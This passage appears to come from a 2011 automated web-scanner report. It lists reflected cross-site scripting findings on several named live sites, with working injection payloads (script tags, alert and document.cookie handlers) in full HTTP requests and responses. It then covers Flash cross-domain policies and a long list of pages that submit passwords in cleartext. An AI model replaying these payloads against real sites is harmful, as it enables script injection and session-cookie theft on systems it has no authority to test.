The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3f53c"%3balert(1)//864a7b1dec1 was submitted in the BDATALIST cookie. This input was echoed as 3f53c";alert(1)//864a7b1dec1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /used-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c43f53c"%3balert(1)//864a7b1dec1; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:48:36 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:48:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:48:35 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:48:35 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 79106

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c43f53c";alert(1)//864a7b1dec1";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "484871FD-C2C1-FD9F-540E5F1F
...[SNIP]...

4.2088. http://www.autobytel.com/used-cars.htm [ENTERED_POSTAL_CODE_VCH cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/used-cars.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c0ef"%3balert(1)//997bf3f94eb was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 5c0ef";alert(1)//997bf3f94eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /used-cars.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=5c0ef"%3balert(1)//997bf3f94eb; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:52:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:52:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:52:26 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:52:26 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 79106

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
= "usedhome|uhp";

           //s.prop9 = "usedhome|Search Engine Optimization Project|13148";
           s.prop10 = "usedhome|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "5c0ef";alert(1)//997bf3f94eb||";

           s.prop14 = "used cars page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "usedhome|||rec|sky|ban|Sea
...[SNIP]...

4.2089. http://www.autobytel.com/x22 [BDATALIST cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autobytel.com
Path:	/x22

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 97692"%3balert(1)//3713275794b was submitted in the BDATALIST cookie. This input was echoed as 97692";alert(1)//3713275794b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /x22 HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c497692"%3balert(1)//3713275794b; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23456
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:24:49 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:24:49 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:24:49 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:24:49 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/




  <!--
This file creates a boxerjam cookie that expires
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c497692";alert(1)//3713275794b";


           //Zane 2/11/10 - Recently Viewed


                       //Paul Koch 3/17/08 - add cpcID


           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "476ECC60-90F5-9305-A2EFD2B1
...[SNIP]...

4.2090. http://www.autotrader.com/ [JSESSIONID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.autotrader.com
Path:	/

Issue detail

The value of the JSESSIONID cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5dfa9'-alert(1)-'1f3227d916 was submitted in the JSESSIONID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET / HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIRF_Audit=true; JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE5dfa9'-alert(1)-'1f3227d916; ATC_USER_ZIP=; ATC_PID=-1761786222|959219900373039673; v1st=BF3F7217996B123A; ATC_ID=173.193.214.243.1295884767492259; BIGipServerwww=1619582986.61475.0000; mbox=check#true#1295922044|session#1295921983404-727382#1295923844|PC#1295921983404-727382.17#1297131585;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 14:15:28 GMT
Server: Apache
Set-Cookie: JSESSIONID=9FDC9D8306C6C65BA049C7655627ABAE5dfa9'-alert(1)-'1f3227d916; Path=/
Set-Cookie: ATC_USER_ZIP=; Domain=.autotrader.com; Expires=Wed, 01-Feb-2012 14:15:28 GMT; Path=/
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Set-Cookie: BIGipServerAT-Production_hhtp=3459409418.61475.0000; path=/
Content-Length: 60029

<!DOCTYPE html P
...[SNIP]...
<script type="text/javascript">
var sessionID = '9FDC9D8306C6C65BA049C7655627ABAE5dfa9'-alert(1)-'1f3227d916';
var newCarAd = '<p class="atcui-label">
...[SNIP]...

4.2091. http://www.newsvine.com/_wine/save [u parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_wine/save

Issue detail

The value of the u request parameter is copied into the HTML document as plain text between tags. The payload ddaad<script>alert(1)</script>54e5082e4da was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /_wine/save?u={u}ddaad<script>alert(1)</script>54e5082e4da&h={t} HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 05:03:38 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=1afd75fafa487fadf3e5e60f37cd6487; expires=Mon, 20-Jan-2031 05:03:38 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/login?popoff&redirect=http%3A%2F%2Fwww.newsvine.com%2F_wine%2Fsave%3Fu%3D%7Bu%7Dddaad%3Cscript%3Ealert%281%29%3C%2Fscript%3E54e5082e4da%26h%3D%7Bt%7D
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 15749

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...
<div style="width: 410px; overflow: hidden; height: 1.3em;">http://{u}ddaad<script>alert(1)</script>54e5082e4da</div>
...[SNIP]...

4.2092. http://www.newsvine.com/_wine/save [u parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.newsvine.com
Path:	/_wine/save

Issue detail

The value of the u request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84841"><script>alert(1)</script>0d6cee6e495 was submitted in the u parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /_wine/save?u={u}84841"><script>alert(1)</script>0d6cee6e495&h={t} HTTP/1.1
Host: www.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Found
Date: Tue, 25 Jan 2011 05:03:25 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=5e60e8bada3f2a6ac8bd91e7d555bf9a; expires=Mon, 20-Jan-2031 05:03:25 GMT; path=/; domain=.newsvine.com
Location: https://www.newsvine.com/_nv/accounts/login?popoff&redirect=http%3A%2F%2Fwww.newsvine.com%2F_wine%2Fsave%3Fu%3D%7Bu%7D84841%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E0d6cee6e495%26h%3D%7Bt%7D
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 15755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<script type="text/javascr
...[SNIP]...
<input type="hidden" id="saveURL" name="url" value="http://{u}84841"><script>alert(1)</script>0d6cee6e495" />
...[SNIP]...

4.2093. http://www.payloadmagazine.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.payloadmagazine.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad960"><script>alert(1)</script>a93993ab4cb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?ad960"><script>alert(1)</script>a93993ab4cb=1 HTTP/1.1
Host: www.payloadmagazine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 25 Jan 2011 00:08:57 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) PHP/4.4.2-0.dotdeb.1 mod_perl/1.29
Connection: close
Location: http://www.commercialtrucktrader.com/?ad960"><script>alert(1)</script>a93993ab4cb=1
Content-Type: text/html; charset=iso-8859-1
Content-Length: 458

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML><HEAD><TITLE>www.payloadmagazine.com</TITLE>
<META NAME="keywords" CONTENT="None">
<META NAME="robots" CONTENT="index,follow">
<META NAME="descript
...[SNIP]...
<A HREF="http://www.commercialtrucktrader.com/?ad960"><script>alert(1)</script>a93993ab4cb=1">
...[SNIP]...

5. Flash cross-domain policy previous next
There are 2 instances of this issue:

http://ads.doclix.com/crossdomain.xml
http://www.youtube.com/crossdomain.xml

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://ads.doclix.com/crossdomain.xml previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.doclix.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.doclix.com

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:58:38 GMT
ETag: W/"205-1285004403000"
Last-Modified: Mon, 20 Sep 2010 17:40:03 GMT
Content-Type: application/xml
Content-Length: 205
Vary: Accept-Encoding
P3P: CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC",policyref="http://track.doclix.com/w3c/p3p.xml"
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...

5.2. http://www.youtube.com/crossdomain.xml previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Mon, 24 Jan 2011 14:58:57 GMT
Server: Apache
Last-Modified: Wed, 19 Jan 2011 17:17:52 GMT
ETag: "132-49a363270b000"
Accept-Ranges: bytes
Content-Length: 306
Content-Type: application/xml

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

6. Cleartext submission of password previous next
There are 286 instances of this issue:

http://community.joomla.org/login.html
http://community.joomla.org/showcase/
http://community.joomla.org/showcase/how-to-submit-a-site.html
http://community.joomla.org/showcase/sites-of-the-month.html
http://community.joomla.org/showcase/sites/advsearch.html
http://community.joomla.org/showcase/sites/new.html
http://community.joomla.org/user-groups.html
http://demo16.cloudaccess.net/
http://demo16.cloudaccess.net/administrator/index.php
http://docs.joomla.org/index.php
http://extensions.joomla.org/
http://extensions.joomla.org/extensions
http://extensions.joomla.org/extensions/advanced-search
http://extensions.joomla.org/extensions/languages/translations-for-joomla
http://extensions.joomla.org/extensions/new
http://fastdial.com/
http://fastdial.com/0
http://fastdial.com/user
http://fastdial.com/website
http://fastdial.com/welcome-fast-dial-firefox-4
http://forum.joomla.org/
http://forum.joomla.org/ucp.php
http://forum.joomla.org/viewforum.php
http://forumas.lithuanianjoomla.com/
http://forums.freebsd.org/
http://help.tweetmeme.com/
http://help.tweetmeme.com/2009/04/07/api-documentation/
http://help.tweetmeme.com/2009/04/09/rss-feeds/
http://help.tweetmeme.com/2009/04/09/twitter-feeds/
http://help.tweetmeme.com/contact/
http://help.tweetmeme.com/forum/forum/33
http://help.tweetmeme.com/language/
http://it.toolbox.com/blogs/database-soup
http://it.toolbox.com/blogs/database-talk
http://it.toolbox.com/blogs/db2luw
http://it.toolbox.com/blogs/db2zos
http://it.toolbox.com/blogs/elsua
http://it.toolbox.com/blogs/juice-analytics
http://it.toolbox.com/blogs/minimalit
http://it.toolbox.com/blogs/penguinista-databasiensis
http://it.toolbox.com/blogs/ppmtoday
http://joomlacode.org/gf/account/
http://my.joomla.org/
http://netvouz.com/action/submitBookmark
http://newsguy.com/
http://people.joomla.org/
http://people.joomla.org/
http://people.joomla.org/groups/viewdiscussion/996-Joomla..%2016%20Has%20Arrived.html
http://resources.joomla.org/
http://resources.joomla.org/directory/advsearch.html
http://resources.joomla.org/directory/new.html
http://resources.joomla.org/how-to-add-listings.html
http://slashdot.org/bookmark.pl
http://slashdot.org/bookmark.pl
http://spongecell.com/event_list
http://themehybrid.com/
http://themehybrid.com/themes/shadow
http://venedet.michnica.net/index.php/joomla/1-joomla-16-je-tu
http://wordpress.org/extend/plugins/tweetmeme-follow-button/
http://wordpress.org/extend/plugins/tweetmeme/
http://wordpress.org/extend/plugins/wp-pagenavi/
http://www.adside.com/adside/advertiser.html
http://www.adside.com/adside/publisher.html
http://www.americascupmedia.com/index.php
http://www.barkerstores.com/soundings/
http://www.dynamicdrive.com/forums/showthread.php
http://www.eraser.ee/uudised/joomla/329-joomla-16-on-saabunud.html
http://www.facebook.com/
http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22
http://www.homes.com/
http://www.id-joomla.com/berita-joomla/648-joomla-16-telah-datang
http://www.joomla.org/login.html
http://www.joomla.org.tw/news/joomla-official-news/163-joomla16-arrived
http://www.joomlacommunity.eu/nieuws/joomla-versies/572-joomla-16-nu-beschikbaar.html
http://www.joomlacorner.com/joomla-news/608-joomla-16-has-arrived.html
http://www.linkagogo.com/go/AddNoPopup
http://www.lithuanianjoomla.com/
http://www.lithuanianjoomla.com/7-joomla-naujienos/70-joomla-160-isleista.html
http://www.lithuanianjoomla.com/apie-joomla.html
http://www.lithuanianjoomla.com/component/users/
http://www.lithuanianjoomla.com/component/users/
http://www.lithuanianjoomla.com/index.php
http://www.lithuanianjoomla.com/joomla-naujienos.html
http://www.lithuanianjoomla.com/joomla-naujienos/2-laikas-isrinkti-geriausia-pasaulyje-tvs.html
http://www.lithuanianjoomla.com/joomla-naujienos/3-lithuanianjoomlacom-logotipo-konkursas.html
http://www.lithuanianjoomla.com/joomla-naujienos/4-lietuviskas-joomla-puslapis-lithuanianjoomlacom.html
http://www.lithuanianjoomla.com/joomla-naujienos/5-pirmasis-joomla-gimtadienis.html
http://www.lithuanianjoomla.com/joomla-naujienos/6-joomla-vel-laimejo-geriausios-tvs-apdavanojimus.html
http://www.lithuanianjoomla.com/joomla-naujienos/65-joomla-1522-versija-istaiso-saugumo-spraga.html
http://www.lithuanianjoomla.com/joomla-naujienos/67-joomla-16-rc1-versija.html
http://www.lithuanianjoomla.com/joomla-naujienos/68-joomla-sveikinimas-sv-kaledu-ir-naujuju-metu-proga.html
http://www.lithuanianjoomla.com/joomla-naujienos/69-lithuanianjoomlacom-atnaujinama.html
http://www.lithuanianjoomla.com/joomla-naujienos/70-joomla-16-isleista.html
http://www.lithuanianjoomla.com/joomla-naujienos/71-lietuviu-kalba-joomla-16-versijai.html
http://www.lithuanianjoomla.com/joomla-sasajos.html
http://www.lithuanianjoomla.com/joomla-saugumas.html
http://www.lithuanianjoomla.com/joomla-versijos.html
http://www.lithuanianjoomla.com/kaip-idiegti-joomla.html
http://www.lithuanianjoomla.com/kontaktai.html
http://www.lithuanianjoomla.com/lithuanianjoomlacom-misija.html
http://www.lithuanianjoomla.com/lithuanianjoomlacom-vizija.html
http://www.lithuanianjoomla.com/naujienos.html
http://www.lithuanianjoomla.com/saugi-joomla.html
http://www.lithuanianjoomla.com/saugi-joomla/75-kas-yra-saugus-patikimas-pilnas-joomla-turinio-valdymo-sistemos-paketas.html
http://www.livejournal.com/update.bml
http://www.nbc.com/
http://www.netlingo.com/login.php
http://www.netlingo.com/register-premium.php
http://www.netlingo.com/register.php
http://www.networkworld.com/news/2010/100710-ebay-deploys-joomla-for-analytics.html
http://www.noreastermagazine.com/
http://www.paperg.com/
http://www.playshakespeare.com/
http://www.regattaregatta.com/
http://www.rockettheme.com/
http://www.shape.com/workouts/articles/blood_sugar.html
http://www.shape.com/workouts/articles/workout_schedule.html
http://www.svenskjoomla.se/index.php
http://www.thefeast.com/boston/
http://www.thefeast.com/boston/
http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html
http://www.thefeast.com/boston/Better-Yourself-Get-Smart-with-Our-Cheap-Picks-114487719.html
http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html
http://www.thefeast.com/boston/Trailer-Park-Boys-Bring-Trash-Talk-at-The-Wilbur-114477904.html
http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html
http://www.thefeast.com/boston/shopping/FEAST-SHOP-BOS-A-Puffer-Never-Looked-So-Cute-114479944.html
http://www.usaca.info/
http://www.w-w-i.com/
http://www.w-w-i.com/velux_5_oceans_2010_race/
http://www.woothemes.com/
http://www.x64bitdownload.com/
http://www.x64bitdownload.com/64-bit-archive-downloads.html
http://www.x64bitdownload.com/64-bit-assembling-downloads.html
http://www.x64bitdownload.com/64-bit-atom-downloads.html
http://www.x64bitdownload.com/64-bit-audio-downloads.html
http://www.x64bitdownload.com/64-bit-automatic-downloads.html
http://www.x64bitdownload.com/64-bit-autoposter-downloads.html
http://www.x64bitdownload.com/64-bit-binaries-downloads.html
http://www.x64bitdownload.com/64-bit-binary-downloader-downloads.html
http://www.x64bitdownload.com/64-bit-binary-downloads.html
http://www.x64bitdownload.com/64-bit-board-downloads.html
http://www.x64bitdownload.com/64-bit-boards-downloads.html
http://www.x64bitdownload.com/64-bit-client-downloads.html
http://www.x64bitdownload.com/64-bit-commander-downloads.html
http://www.x64bitdownload.com/64-bit-community-downloads.html
http://www.x64bitdownload.com/64-bit-complex-downloads.html
http://www.x64bitdownload.com/64-bit-conference-downloads.html
http://www.x64bitdownload.com/64-bit-cross-downloads.html
http://www.x64bitdownload.com/64-bit-download-downloads.html
http://www.x64bitdownload.com/64-bit-downloader-downloads.html
http://www.x64bitdownload.com/64-bit-explorer-downloads.html
http://www.x64bitdownload.com/64-bit-ext2fs-ext3fs-paragon-extbrowser-downloads.html
http://www.x64bitdownload.com/64-bit-fast-download-downloads.html
http://www.x64bitdownload.com/64-bit-feed-downloads.html
http://www.x64bitdownload.com/64-bit-feedreader-downloads.html
http://www.x64bitdownload.com/64-bit-file-grabber-downloads.html
http://www.x64bitdownload.com/64-bit-file-sharing-downloads.html
http://www.x64bitdownload.com/64-bit-firefox-downloads.html
http://www.x64bitdownload.com/64-bit-forum-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-forum-downloads.html
http://www.x64bitdownload.com/64-bit-forums-downloads.html
http://www.x64bitdownload.com/64-bit-google-groups-downloads.html
http://www.x64bitdownload.com/64-bit-grabber-downloads.html
http://www.x64bitdownload.com/64-bit-group-downloads.html
http://www.x64bitdownload.com/64-bit-groups-downloads.html
http://www.x64bitdownload.com/64-bit-highspeed-connection-downloads.html
http://www.x64bitdownload.com/64-bit-image-grabber-downloads.html
http://www.x64bitdownload.com/64-bit-images-downloads.html
http://www.x64bitdownload.com/64-bit-internet-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-internet-downloads.html
http://www.x64bitdownload.com/64-bit-kill-file-downloads.html
http://www.x64bitdownload.com/64-bit-killfile-downloads.html
http://www.x64bitdownload.com/64-bit-mp3-downloads.html
http://www.x64bitdownload.com/64-bit-multimedia-downloads.html
http://www.x64bitdownload.com/64-bit-multipart-downloads.html
http://www.x64bitdownload.com/64-bit-news-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-news-downloads.html
http://www.x64bitdownload.com/64-bit-news-reader-downloads.html
http://www.x64bitdownload.com/64-bit-newsfeed-downloads.html
http://www.x64bitdownload.com/64-bit-newsgroup-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-newsgroup-downloads.html
http://www.x64bitdownload.com/64-bit-newsgroups-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-newsgroups-downloads.html
http://www.x64bitdownload.com/64-bit-newsreader-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-newsreader-downloads.html
http://www.x64bitdownload.com/64-bit-nntp-c-44-newsgroup-clients-downloads.html
http://www.x64bitdownload.com/64-bit-nntp-downloads.html
http://www.x64bitdownload.com/64-bit-nzb-downloads.html
